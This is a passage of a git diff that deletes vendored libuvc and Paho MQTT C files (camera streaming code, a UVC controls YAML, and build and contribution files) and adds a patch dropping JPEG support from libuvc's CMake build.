-  pthread_cond_broadcast(&strmh->cb_cond);
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  /** @todo stop the actual stream, camera side? */
-
-  if (strmh->user_cb) {
-    /* wait for the thread to stop (triggered by
-     * LIBUSB_TRANSFER_CANCELLED transfer) */
-    pthread_join(strmh->cb_thread, NULL);
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Close stream.
- * @ingroup streaming
- *
- * Closes stream, frees handle and all streaming resources.
- *
- * @param strmh UVC stream handle
- */
-void uvc_stream_close(uvc_stream_handle_t *strmh) {
-  if (strmh->running)
-    uvc_stream_stop(strmh);
-
-  uvc_release_if(strmh->devh, strmh->stream_if->bInterfaceNumber);
-
-  if (strmh->frame.data)
-    free(strmh->frame.data);
-
-  free(strmh->outbuf);
-  free(strmh->holdbuf);
-
-  pthread_cond_destroy(&strmh->cb_cond);
-  pthread_mutex_destroy(&strmh->cb_mutex);
-
-  DL_DELETE(strmh->devh->streams, strmh);
-  free(strmh);
-}
diff --git a/thirdparty/libuvc-0.0.6/src/test.c b/thirdparty/libuvc-0.0.6/src/test.c
deleted file mode 100644
index e48cfc9..0000000
--- a/thirdparty/libuvc-0.0.6/src/test.c
+++ /dev/null
@@ -1,153 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-#include <stdio.h>
-#include <opencv/highgui.h>
-
-#include "libuvc/libuvc.h"
-
-void cb(uvc_frame_t *frame, void *ptr) {
-  uvc_frame_t *bgr;
-  uvc_error_t ret;
-  IplImage* cvImg;
-
-  printf("callback! length = %u, ptr = %d\n", frame->data_bytes, (int) ptr);
-
-  bgr = uvc_allocate_frame(frame->width * frame->height * 3);
-  if (!bgr) {
-    printf("unable to allocate bgr frame!");
-    return;
-  }
-
-  ret = uvc_any2bgr(frame, bgr);
-  if (ret) {
-    uvc_perror(ret, "uvc_any2bgr");
-    uvc_free_frame(bgr);
-    return;
-  }
-
-  cvImg = cvCreateImageHeader(
-      cvSize(bgr->width, bgr->height),
-      IPL_DEPTH_8U,
-      3);
-
-  cvSetData(cvImg, bgr->data, bgr->width * 3); 
-
-  cvNamedWindow("Test", CV_WINDOW_AUTOSIZE);
-  cvShowImage("Test", cvImg);
-  cvWaitKey(10);
-
-  cvReleaseImageHeader(&cvImg);
-
-  uvc_free_frame(bgr);
-}
-
-int main(int argc, char **argv) {
-  uvc_context_t *ctx;
-  uvc_error_t res;
-  uvc_device_t *dev;
-  uvc_device_handle_t *devh;
-  uvc_stream_ctrl_t ctrl;
-
-  res = uvc_init(&ctx, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_init");
-    return res;
-  }
-
-  puts("UVC initialized");
-
-  res = uvc_find_device(
-      ctx, &dev,
-      0, 0, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_find_device");
-  } else {
-    puts("Device found");
-
-    res = uvc_open(dev, &devh);
-
-    if (res < 0) {
-      uvc_perror(res, "uvc_open");
-    } else {
-      puts("Device opened");
-
-      uvc_print_diag(devh, stderr);
-
-      res = uvc_get_stream_ctrl_format_size(
-          devh, &ctrl, UVC_FRAME_FORMAT_YUYV, 640, 480, 30
-      );
-
-      uvc_print_stream_ctrl(&ctrl, stderr);
-
-      if (res < 0) {
-        uvc_perror(res, "get_mode");
-      } else {
-        res = uvc_start_streaming(devh, &ctrl, cb, 12345, 0);
-
-        if (res < 0) {
-          uvc_perror(res, "start_streaming");
-        } else {
-          puts("Streaming for 10 seconds...");
-          uvc_error_t resAEMODE = uvc_set_ae_mode(devh, 1);
-          uvc_perror(resAEMODE, "set_ae_mode");
-          int i;
-          for (i = 1; i <= 10; i++) {
-            /* uvc_error_t resPT = uvc_set_pantilt_abs(devh, i * 20 * 3600, 0); */
-            /* uvc_perror(resPT, "set_pt_abs"); */
-            uvc_error_t resEXP = uvc_set_exposure_abs(devh, 20 + i * 5);
-            uvc_perror(resEXP, "set_exp_abs");
-            
-            sleep(1);
-          }
-          sleep(10);
-          uvc_stop_streaming(devh);
-	  puts("Done streaming.");
-        }
-      }
-
-      uvc_close(devh);
-      puts("Device closed");
-    }
-
-    uvc_unref_device(dev);
-  }
-
-  uvc_exit(ctx);
-  puts("UVC exited");
-
-  return 0;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/standard-units.yaml b/thirdparty/libuvc-0.0.6/standard-units.yaml
deleted file mode 100644
index 198c401..0000000
--- a/thirdparty/libuvc-0.0.6/standard-units.yaml
+++ /dev/null
@@ -1,518 +0,0 @@
-units:
-  camera_terminal:
-    type: standard
-    description: Standard camera input terminal (captures images from sensor)
-    control_prefix: CT
-    controls:
-      scanning_mode:
-        control: SCANNING_MODE
-        length: 1
-        fields:
-          mode:
-            type: int
-            position: 0
-            length: 1
-            doc: '0: interlaced, 1: progressive'
-      ae_mode:
-        control: AE_MODE
-        length: 1
-        fields:
-          mode:
-            type: int
-            position: 0
-            length: 1
-            doc: '1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture
-              priority mode'
-        doc:
-          get: |-
-            @brief Reads camera's auto-exposure mode.
-
-            See uvc_set_ae_mode() for a description of the available modes.
-          set: |-
-            @brief Sets camera's auto-exposure mode.
-
-            Cameras may support any of the following AE modes:
-             * UVC_AUTO_EXPOSURE_MODE_MANUAL (1) - manual exposure time, manual iris
-             * UVC_AUTO_EXPOSURE_MODE_AUTO (2) - auto exposure time, auto iris
-             * UVC_AUTO_EXPOSURE_MODE_SHUTTER_PRIORITY (4) - manual exposure time, auto iris
-             * UVC_AUTO_EXPOSURE_MODE_APERTURE_PRIORITY (8) - auto exposure time, manual iris
-
-            Most cameras provide manual mode and aperture priority mode.
-      ae_priority:
-        control: AE_PRIORITY
-        length: 1
-        fields:
-          priority:
-            type: int
-            position: 0
-            length: 1
-            doc: '0: frame rate must remain constant; 1: frame rate may be varied
-              for AE purposes'
-        doc:
-          get: |-
-            @brief Checks whether the camera may vary the frame rate for exposure control reasons.
-            See uvc_set_ae_priority() for a description of the `priority` field.
-          set: |-
-            @brief Chooses whether the camera may vary the frame rate for exposure control reasons.
-            A `priority` value of zero means the camera may not vary its frame rate. A value of 1
-            means the frame rate is variable. This setting has no effect outside of the `auto` and
-            `shutter_priority` auto-exposure modes.
-      exposure_abs:
-        control: EXPOSURE_TIME_ABSOLUTE
-        length: 4
-        fields:
-          time:
-            type: int
-            position: 0
-            length: 4
-            doc: ''
-        doc:
-          get: |-
-            @brief Gets the absolute exposure time.
-
-            See uvc_set_exposure_abs() for a description of the `time` field.
-          set: |-
-            @brief Sets the absolute exposure time.
-
-            The `time` parameter should be provided in units of 0.0001 seconds (e.g., use the value 100
-            for a 10ms exposure period). Auto exposure should be set to `manual` or `shutter_priority`
-            before attempting to change this setting.
-      exposure_rel:
-        control: EXPOSURE_TIME_RELATIVE
-        length: 1
-        fields:
-          step:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: number of steps by which to change the exposure time, or zero to
-              set the default exposure time
-        doc: '@brief {gets_sets} the exposure time relative to the current setting.'
-      focus_abs:
-        control: FOCUS_ABSOLUTE
-        length: 2
-        fields:
-          focus:
-            type: int
-            position: 0
-            length: 2
-            doc: focal target distance in millimeters
-        doc: '@brief {gets_sets} the distance at which an object is optimally focused.'
-      focus_rel:
-        control: FOCUS_RELATIVE
-        length: 2
-        fields:
-          focus_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-      focus_simple_range:
-        control: FOCUS_SIMPLE
-        length: 1
-        fields:
-          focus:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      focus_auto:
-        control: FOCUS_AUTO
-        length: 1
-        fields:
-          state:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      iris_abs:
-        control: IRIS_ABSOLUTE
-        length: 2
-        fields:
-          iris:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      iris_rel:
-        control: IRIS_RELATIVE
-        length: 1
-        fields:
-          iris_rel:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      zoom_abs:
-        control: ZOOM_ABSOLUTE
-        length: 2
-        fields:
-          focal_length:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      zoom_rel:
-        control: ZOOM_RELATIVE
-        length: 3
-        fields:
-          zoom_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          digital_zoom:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-          speed:
-            type: int
-            position: 2
-            length: 1
-            doc: TODO
-      pantilt_abs:
-        control: PANTILT_ABSOLUTE
-        length: 8
-        fields:
-          pan:
-            type: int
-            position: 0
-            length: 4
-            signed: true
-            doc: TODO
-          tilt:
-            type: int
-            position: 4
-            length: 4
-            signed: true
-            doc: TODO
-      pantilt_rel:
-        control: PANTILT_RELATIVE
-        length: 4
-        fields:
-          pan_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          pan_speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-          tilt_rel:
-            type: int
-            position: 2
-            length: 1
-            signed: true
-            doc: TODO
-          tilt_speed:
-            type: int
-            position: 3
-            length: 1
-            doc: TODO
-      roll_abs:
-        control: ROLL_ABSOLUTE
-        length: 2
-        fields:
-          roll:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      roll_rel:
-        control: ROLL_RELATIVE
-        length: 2
-        fields:
-          roll_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-      privacy:
-        control: PRIVACY
-        length: 1
-        fields:
-          privacy:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      digital_window:
-        control: DIGITAL_WINDOW
-        length: 12
-        fields:
-          window_top:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          window_left:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-          window_bottom:
-            type: int
-            position: 4
-            length: 2
-            doc: TODO
-          window_right:
-            type: int
-            position: 6
-            length: 2
-            doc: TODO
-          num_steps:
-            type: int
-            position: 8
-            length: 2
-            doc: TODO
-          num_steps_units:
-            type: int
-            position: 10
-            length: 2
-            doc: TODO
-      digital_roi:
-        control: REGION_OF_INTEREST
-        length: 10
-        fields:
-          roi_top:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          roi_left:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-          roi_bottom:
-            type: int
-            position: 4
-            length: 2
-            doc: TODO
-          roi_right:
-            type: int
-            position: 6
-            length: 2
-            doc: TODO
-          auto_controls:
-            type: int
-            position: 8
-            length: 2
-            doc: TODO
-  processing_unit:
-    type: standard
-    description: Standard processing unit (processes images between other units)
-    control_prefix: PU
-    controls:
-      backlight_compensation:
-        control: BACKLIGHT_COMPENSATION
-        length: 2
-        fields:
-          backlight_compensation:
-            type: int
-            position: 0
-            length: 2
-            doc: device-dependent backlight compensation mode; zero means backlight
-              compensation is disabled
-      brightness:
-        control: BRIGHTNESS
-        length: 2
-        fields:
-          brightness:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      contrast:
-        control: CONTRAST
-        length: 2
-        fields:
-          contrast:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      contrast_auto:
-        control: CONTRAST_AUTO
-        length: 1
-        fields:
-          contrast_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      gain:
-        control: GAIN
-        length: 2
-        fields:
-          gain:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      power_line_frequency:
-        control: POWER_LINE_FREQUENCY
-        length: 1
-        fields:
-          power_line_frequency:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      hue:
-        control: HUE
-        length: 2
-        fields:
-          hue:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      hue_auto:
-        control: HUE_AUTO
-        length: 1
-        fields:
-          hue_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      saturation:
-        control: SATURATION
-        length: 2
-        fields:
-          saturation:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      sharpness:
-        control: SHARPNESS
-        length: 2
-        fields:
-          sharpness:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      gamma:
-        control: GAMMA
-        length: 2
-        fields:
-          gamma:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      white_balance_temperature:
-        control: WHITE_BALANCE_TEMPERATURE
-        length: 2
-        fields:
-          temperature:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      white_balance_temperature_auto:
-        control: WHITE_BALANCE_TEMPERATURE_AUTO
-        length: 1
-        fields:
-          temperature_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      white_balance_component:
-        control: WHITE_BALANCE_COMPONENT
-        length: 4
-        fields:
-          blue:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          red:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-      white_balance_component_auto:
-        control: WHITE_BALANCE_COMPONENT_AUTO
-        length: 1
-        fields:
-          white_balance_component_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      digital_multiplier:
-        control: DIGITAL_MULTIPLIER
-        length: 2
-        fields:
-          multiplier_step:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      digital_multiplier_limit:
-        control: DIGITAL_MULTIPLIER_LIMIT
-        length: 2
-        fields:
-          multiplier_step:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      analog_video_standard:
-        control: ANALOG_VIDEO_STANDARD
-        length: 1
-        fields:
-          video_standard:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      analog_video_lock_status:
-        control: ANALOG_LOCK_STATUS
-        length: 1
-        fields:
-          status:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-  selector_unit:
-    type: standard
-    description: Standard selector unit (controls connectivity between other units)
-    control_prefix: SU
-    controls:
-      input_select:
-        control: INPUT_SELECT
-        length: 1
-        fields:
-          selector:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
diff --git a/thirdparty/libuvc/libuvc.patch b/thirdparty/libuvc/libuvc.patch
new file mode 100644
index 0000000..1d30e37
--- /dev/null
+++ b/thirdparty/libuvc/libuvc.patch
@@ -0,0 +1,44 @@
+diff -rupN orig/CMakeLists.txt patched/CMakeLists.txt
+--- orig/CMakeLists.txt	2017-09-21 04:39:28.000000000 +0200
++++ patched/CMakeLists.txt	2019-09-11 13:59:58.000000000 +0200
+@@ -22,24 +22,6 @@ set(libuvc_URL "https://github.com/ktoss
+ find_package(PkgConfig)
+ pkg_check_modules(LIBUSB libusb-1.0)
+ 
+-# Try to find JPEG using a module or pkg-config. If that doesn't work, search for the header.
+-find_package(jpeg QUIET)
+-if(JPEG_FOUND)
+-  set(JPEG_LINK_FLAGS ${JPEG_LIBRARIES})
+-else()
+-  pkg_check_modules(JPEG QUIET libjpeg)
+-  if(JPEG_FOUND)
+-      set(JPEG_INCLUDE_DIR ${JPEG_INCLUDE_DIRS})
+-      set(JPEG_LINK_FLAGS ${JPEG_LDFLAGS})
+-  else()
+-    find_path(JPEG_INCLUDE_DIR jpeglib.h)
+-    if(JPEG_INCLUDE_DIR)
+-      set(JPEG_FOUND ON)
+-      set(JPEG_LINK_FLAGS -ljpeg)
+-    endif()
+-  endif()
+-endif()
+-
+ include(GNUInstallDirs)
+ 
+ SET(CMAKE_C_FLAGS_DEBUG "-g -DUVC_DEBUGGING")
+@@ -57,14 +39,7 @@ include_directories(
+   ${LIBUSB_INCLUDE_DIRS}
+ )
+ 
+-if(JPEG_FOUND)
+-  message(STATUS "Building libuvc with JPEG support.")
+-  include_directories(${JPEG_INCLUDE_DIR})
+-  SET(LIBUVC_HAS_JPEG TRUE)
+-  SET(SOURCES ${SOURCES} src/frame-mjpeg.c)
+-else()
+-  message(WARNING "JPEG not found. libuvc will not support JPEG decoding.")
+-endif()
++message(WARNING "libuvc will not support JPEG decoding.")
+ 
+ if(${CMAKE_BUILD_TARGET} MATCHES "Shared")
+   set(BUILD_UVC_SHARED TRUE)
diff --git a/thirdparty/paho.mqtt.c/.gitignore b/thirdparty/paho.mqtt.c/.gitignore
deleted file mode 100644
index 5b2b31f..0000000
--- a/thirdparty/paho.mqtt.c/.gitignore
+++ /dev/null
@@ -1,6 +0,0 @@
-/dep/
-/build/
-/build.paho/
-*.swp
-*.pyc
-/build.paho
diff --git a/thirdparty/paho.mqtt.c/.gitreview b/thirdparty/paho.mqtt.c/.gitreview
deleted file mode 100644
index 2d16be7..0000000
--- a/thirdparty/paho.mqtt.c/.gitreview
+++ /dev/null
@@ -1,5 +0,0 @@
-[gerrit]
-host=git.eclipse.org
-port=29418
-project=paho/org.eclipse.paho.mqtt.c
-defaultbranch=develop
diff --git a/thirdparty/paho.mqtt.c/.pydevproject b/thirdparty/paho.mqtt.c/.pydevproject
deleted file mode 100644
index 40e9f40..0000000
--- a/thirdparty/paho.mqtt.c/.pydevproject
+++ /dev/null
@@ -1,5 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="no"?>
-<?eclipse-pydev version="1.0"?><pydev_project>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
-</pydev_project>
diff --git a/thirdparty/paho.mqtt.c/CMakeLists.txt b/thirdparty/paho.mqtt.c/CMakeLists.txt
deleted file mode 100644
index 1c2593b..0000000
--- a/thirdparty/paho.mqtt.c/CMakeLists.txt
+++ /dev/null
@@ -1,86 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Genis Riera Perez - Add support for building debian package
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-CMAKE_MINIMUM_REQUIRED(VERSION 2.8.4)
-PROJECT("paho" C)
-MESSAGE(STATUS "CMake version: " ${CMAKE_VERSION})
-MESSAGE(STATUS "CMake system name: " ${CMAKE_SYSTEM_NAME})
-
-SET(CMAKE_SCRIPTS "${CMAKE_SOURCE_DIR}/cmake")
-SET(CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
-
-## build settings
-SET(PAHO_VERSION_MAJOR 1)
-SET(PAHO_VERSION_MINOR 2)
-SET(PAHO_VERSION_PATCH 0)
-SET(CLIENT_VERSION ${PAHO_VERSION_MAJOR}.${PAHO_VERSION_MINOR}.${PAHO_VERSION_PATCH})
-
-INCLUDE(GNUInstallDirs)
-
-STRING(TIMESTAMP BUILD_TIMESTAMP UTC)
-MESSAGE(STATUS "Timestamp is ${BUILD_TIMESTAMP}")
-
-IF(WIN32)
-  ADD_DEFINITIONS(-D_CRT_SECURE_NO_DEPRECATE -DWIN32_LEAN_AND_MEAN -MD)
-ELSEIF(${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
-  ADD_DEFINITIONS(-DOSX)
-ENDIF()
-
-## build options
-SET(PAHO_WITH_SSL TRUE CACHE BOOL "Flag that defines whether to build ssl-enabled binaries too. ")
-SET(PAHO_BUILD_STATIC TRUE CACHE BOOL "Build static library")
-SET(PAHO_BUILD_DOCUMENTATION FALSE CACHE BOOL "Create and install the HTML based API documentation (requires Doxygen)")
-SET(PAHO_BUILD_SAMPLES FALSE CACHE BOOL "Build sample programs")
-SET(PAHO_BUILD_DEB_PACKAGE FALSE CACHE BOOL "Build debian package")
-SET(PAHO_ENABLE_TESTING FALSE CACHE BOOL "Build tests and run")
-
-ADD_SUBDIRECTORY(src)
-IF(PAHO_BUILD_SAMPLES)
-    ADD_SUBDIRECTORY(src/samples)
-ENDIF()
-
-IF(PAHO_BUILD_DOCUMENTATION)
-    ADD_SUBDIRECTORY(doc)
-ENDIF()
-
-### packaging settings
-IF (WIN32)
-    SET(CPACK_GENERATOR "ZIP")
-ELSEIF(PAHO_BUILD_DEB_PACKAGE)
-    SET(CPACK_GENERATOR "DEB")
-    CONFIGURE_FILE(${CMAKE_SCRIPTS}/CPackDebConfig.cmake.in
-        ${CMAKE_BINARY_DIR}/CPackDebConfig.cmake @ONLY)
-    SET(CPACK_PROJECT_CONFIG_FILE ${CMAKE_BINARY_DIR}/CPackDebConfig.cmake)
-    ADD_SUBDIRECTORY(debian)
-ELSE()
-    SET(CPACK_GENERATOR "TGZ")
-ENDIF()
-
-SET(CPACK_PACKAGE_VERSION_MAJOR ${PAHO_VERSION_MAJOR})
-SET(CPACK_PACKAGE_VERSION_MINOR ${PAHO_VERSION_MINOR})
-SET(CPACK_PACKAGE_VERSION_PATCH ${PAHO_VERSION_PATCH})
-INCLUDE(CPack)
-
-IF(PAHO_ENABLE_TESTING)
-    ENABLE_TESTING()
-    INCLUDE_DIRECTORIES(test src)
-    ADD_SUBDIRECTORY(test)
-ELSE()
-    INCLUDE_DIRECTORIES(src)
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/CONTRIBUTING.md b/thirdparty/paho.mqtt.c/CONTRIBUTING.md
deleted file mode 100644
index 1ebe9d1..0000000
--- a/thirdparty/paho.mqtt.c/CONTRIBUTING.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# Contributing to Paho

-

-Thanks for your interest in this project!

-

-You can contribute bugfixes and new features by sending pull requests through GitHub.

-

-## Legal

-

-In order for your contribution to be accepted, it must comply with the Eclipse Foundation IP policy.

-

-Please read the [Eclipse Foundation policy on accepting contributions via Git](http://wiki.eclipse.org/Development_Resources/Contributing_via_Git).

-

-1. Sign the [Eclipse CLA](http://www.eclipse.org/legal/CLA.php)

-  1. Register for an Eclipse Foundation User ID. You can register [here](https://dev.eclipse.org/site_login/createaccount.php).

-  2. Log into the [Projects Portal](https://projects.eclipse.org/), and click on the '[Eclipse CLA](https://projects.eclipse.org/user/sign/cla)' link.

-2. Go to your [account settings](https://dev.eclipse.org/site_login/myaccount.php#open_tab_accountsettings) and add your GitHub username to your account.

-3. Make sure that you _sign-off_ your Git commits in the following format:

-  ``` Signed-off-by: John Smith <johnsmith@nowhere.com> ``` This is usually at the bottom of the commit message. You can automate this by adding the '-s' flag when you make the commits. e.g.   ```git commit -s -m "Adding a cool feature"```

-4. Ensure that the email address that you make your commits with is the same one you used to sign up to the Eclipse Foundation website with.

-

-## Contributing a change

-

-1. [Fork the repository on GitHub](https://github.com/eclipse/paho.mqtt.c/fork)

-2. Clone the forked repository onto your computer: ``` git clone https://github.com/<your username>/paho.mqtt.c.git ```

-3. Create a new branch from the latest ```develop``` branch with ```git checkout -b YOUR_BRANCH_NAME origin/develop```

-4. Make your changes

-5. If developing a new feature, make sure to include JUnit tests.

-6. Ensure that all new and existing tests pass.

-7. Commit the changes into the branch: ``` git commit -s ``` Make sure that your commit message is meaningful and describes your changes correctly.

-8. If you have a lot of commits for the change, squash them into a single / few commits.

-9. Push the changes in your branch to your forked repository.

-10. Finally, go to [https://github.com/eclipse/paho.mqtt.c](https://github.com/eclipse/paho.mqtt.c) and create a pull request from your "YOUR_BRANCH_NAME" branch to the ```develop``` one to request review and merge of the commits in your pushed branch.

-

-

-What happens next depends on the content of the patch. If it is 100% authored

-by the contributor and is less than 1000 lines (and meets the needs of the

-project), then it can be pulled into the main repository. If not, more steps

-are required. These are detailed in the

-[legal process poster](http://www.eclipse.org/legal/EclipseLegalProcessPoster.pdf).

-

-

-

-## Developer resources:

-

-

-Information regarding source code management, builds, coding standards, and more.

-

-- [https://projects.eclipse.org/projects/iot.paho/developer](https://projects.eclipse.org/projects/iot.paho/developer)

-

-Contact:

---------

-

-Contact the project developers via the project's development

-[mailing list](https://dev.eclipse.org/mailman/listinfo/paho-dev).

-

-Search for bugs:

-----------------

-

-This project uses GitHub Issues here: [github.com/eclipse/paho.mqtt.c/issues](https://github.com/eclipse/paho.mqtt.c/issues) to track ongoing development and issues.

-

-Create a new bug:

------------------

-

-Be sure to search for existing bugs before you create another one. Remember that contributions are always welcome!

-

-- [Create new Paho bug](https://github.com/eclipse/paho.mqtt.c/issues/new)

diff --git a/thirdparty/paho.mqtt.c/Makefile b/thirdparty/paho.mqtt.c/Makefile
deleted file mode 100755
index 63d745f..0000000
--- a/thirdparty/paho.mqtt.c/Makefile
+++ /dev/null
@@ -1,283 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2009, 2017 IBM Corp.
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Ian Craggs - initial API and implementation and/or initial documentation
-#     Allan Stockdill-Mander - SSL updates
-#     Andy Piper - various fixes
-#     Ian Craggs - OSX build
-#     Rainer Poisel - support for multi-core builds and cross-compilation
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-SHELL = /bin/sh
-.PHONY: clean, mkdir, install, uninstall, html
-
-ifndef release.version
-  release.version = 1.2.0
-endif
-
-# determine current platform
-BUILD_TYPE ?= debug
-ifeq ($(OS),Windows_NT)
-	OSTYPE ?= $(OS)
-	MACHINETYPE ?= $(PROCESSOR_ARCHITECTURE)
-else
-	OSTYPE ?= $(shell uname -s)
-	MACHINETYPE ?= $(shell uname -m)
-	build.level = $(shell date)
-endif # OS
-ifeq ($(OSTYPE),linux)
-	OSTYPE = Linux
-endif
-
-# assume this is normally run in the main Paho directory
-ifndef srcdir
-  srcdir = src
-endif
-
-ifndef blddir
-  blddir = build/output
-endif
-
-ifndef blddir_work
-  blddir_work = build
-endif
-
-ifndef docdir
-  docdir = $(blddir)/doc
-endif
-
-ifndef docdir_work
-  docdir_work = $(blddir)/../doc
-endif
-
-ifndef prefix
-	prefix = /usr/local
-endif
-
-ifndef exec_prefix
-	exec_prefix = ${prefix}
-endif
-
-bindir = $(exec_prefix)/bin
-includedir = $(prefix)/include
-libdir = $(exec_prefix)/lib
-
-SOURCE_FILES = $(wildcard $(srcdir)/*.c)
-SOURCE_FILES_C = $(filter-out $(srcdir)/MQTTAsync.c $(srcdir)/MQTTVersion.c $(srcdir)/SSLSocket.c, $(SOURCE_FILES))
-SOURCE_FILES_CS = $(filter-out $(srcdir)/MQTTAsync.c $(srcdir)/MQTTVersion.c, $(SOURCE_FILES))
-SOURCE_FILES_A = $(filter-out $(srcdir)/MQTTClient.c $(srcdir)/MQTTVersion.c $(srcdir)/SSLSocket.c, $(SOURCE_FILES))
-SOURCE_FILES_AS = $(filter-out $(srcdir)/MQTTClient.c $(srcdir)/MQTTVersion.c, $(SOURCE_FILES))
-
-HEADERS = $(srcdir)/*.h
-HEADERS_C = $(filter-out $(srcdir)/MQTTAsync.h, $(HEADERS))
-HEADERS_A = $(HEADERS)
-
-SAMPLE_FILES_C = paho_cs_pub paho_cs_sub MQTTClient_publish MQTTClient_publish_async MQTTClient_subscribe
-SYNC_SAMPLES = ${addprefix ${blddir}/samples/,${SAMPLE_FILES_C}}
-
-SAMPLE_FILES_A = paho_c_pub paho_c_sub MQTTAsync_subscribe MQTTAsync_publish
-ASYNC_SAMPLES = ${addprefix ${blddir}/samples/,${SAMPLE_FILES_A}}
-
-TEST_FILES_C = test1 test2 sync_client_test test_mqtt4sync
-SYNC_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_C}}
-
-TEST_FILES_CS = test3
-SYNC_SSL_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_CS}}
-
